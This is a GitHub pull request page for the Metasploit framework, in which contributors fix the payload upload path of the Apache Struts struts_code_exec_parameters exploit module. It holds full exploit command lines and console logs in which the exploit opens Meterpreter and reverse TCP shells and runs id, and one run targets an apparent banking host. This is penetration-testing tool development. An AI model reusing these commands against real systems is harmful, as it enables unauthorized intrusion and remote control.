Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix java payload struts module #3347

Merged
merged 1 commit into from May 11, 2014
Merged

fix java payload struts module #3347

merged 1 commit into from May 11, 2014

Conversation

firefart
Copy link
Contributor

@firefart firefart commented May 9, 2014

This fixes the JAVA payload in the struts_code_exec_parameters exploit as discussed with @jvazquez-r7 in #3343 and on IRC.

This lets the user change the output path of the uploaded binary. In my example the path was not writeable and so the JAVA target did not work correctly.

Output:

$ msfcli exploit/test PARAMETER=username RHOST=ebanking.XXXX RPORT=80 TARGETURI=/login/Login.action TARGET=2 LHOST=10.201.0.70 TMP_PATH=/tmp/ E
[*] Initializing modules...
PARAMETER => username
RHOST => ebanking.XXXX
RPORT => 80
TARGETURI => /login/Login.action
TARGET => 2
LHOST => 10.201.0.70
TMP_PATH => /tmp/
[*] Started reverse handler on 10.201.0.70:4444 
[*] ebanking.XXXX:80 - Uploading exploit to /tmp/uiGUly.jar
[*] ebanking.XXXX:80 - Executing payload
[*] Sending stage (30355 bytes) to 192.168.200.234
[*] Meterpreter session 1 opened (10.201.0.70:4444 -> 192.168.200.234:58517) at 2014-05-09 22:17:18 +0000
[+] Deleted /tmp/uiGUly.jar

meterpreter >

@jvazquez-r7
Copy link
Contributor

The patch shouldn't break nothing, just allow the user to provide a location to land the payload:

msf > use exploit/multi/http/struts_code_exec_parameters
msf exploit(struts_code_exec_parameters) > set rhost 172.16.158.152
rhost => 172.16.158.152
msf exploit(struts_code_exec_parameters) > set TARGETURI /login/Login.action
TARGETURI => /login/Login.action
msf exploit(struts_code_exec_parameters) > set PARAMETER username
PARAMETER => username
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to xiZaBE.jar
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (30355 bytes) to 172.16.158.152
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.152:34945) at 2014-05-11 18:37:18 -0500
[!] This exploit may require manual cleanup of: xiZaBE.jar

meterpreter > getuid
Server username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 2.6.32-38-generic (i386)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.152 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(struts_code_exec_parameters) > set target 1
target => 1
msf exploit(struts_code_exec_parameters) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to /tmp/2Uy3MR
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (36 bytes) to 172.16.158.152
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.152:34946) at 2014-05-11 18:37:39 -0500
[+] Deleted /tmp/2Uy3MR

4126701181
CsSPUZTceKAXluDypmOcNxhipsPWBiKP
clMTTtLbwLzIuWfNdRasYlIbuiqtraDf
id
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 2? [y/N]  y

[*] 172.16.158.152 - Command shell session 2 closed.  Reason: User exit

@jvazquez-r7
Copy link
Contributor

Native payload with TMP_PATH:

msf exploit(struts_code_exec_parameters) > set TMP_PATH /home/juan
TMP_PATH => /home/juan
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[-] Exploit failed [bad-config]: You need to add a trailing slash/backslash to TMP_PATH
msf exploit(struts_code_exec_parameters) > set TMP_PATH /home/juan/
TMP_PATH => /home/juan/
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to /home/juan/SxJHz0R
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (36 bytes) to 172.16.158.152
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.152:34947) at 2014-05-11 18:38:41 -0500
[+] Deleted /home/juan/SxJHz0R

1229511197
ohnsFQkegXdiASKpIHIkYwUptPYqGoRn
gtGIVzPaGKaLcnsSxIRwuTQIEvypFSjn
id
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 3? [y/N]  ^Y

Background session 3? [y/N]
1229511197
ohnsFQkegXdiASKpIHIkYwUptPYqGoRn
gtGIVzPaGKaLcnsSxIRwuTQIEvypFSjn
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 3? [y/N]  y

[*] 172.16.158.152 - Command shell session 3 closed.  Reason: User exit

@jvazquez-r7 jvazquez-r7 merged commit dee6b53 into rapid7:master May 11, 2014
jvazquez-r7 added a commit that referenced this pull request May 11, 2014
@jvazquez-r7
Land #3347, @firefart's change to allow configurable landing dir on s…
b5ba261 
…truts_code_exec_parameters
@jvazquez-r7
Copy link
Contributor

Landed, thanks @firefart for improve this module!

@firefart firefart deleted the struts_tmp branch May 12, 2014 04:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@firefart @jvazquez-r7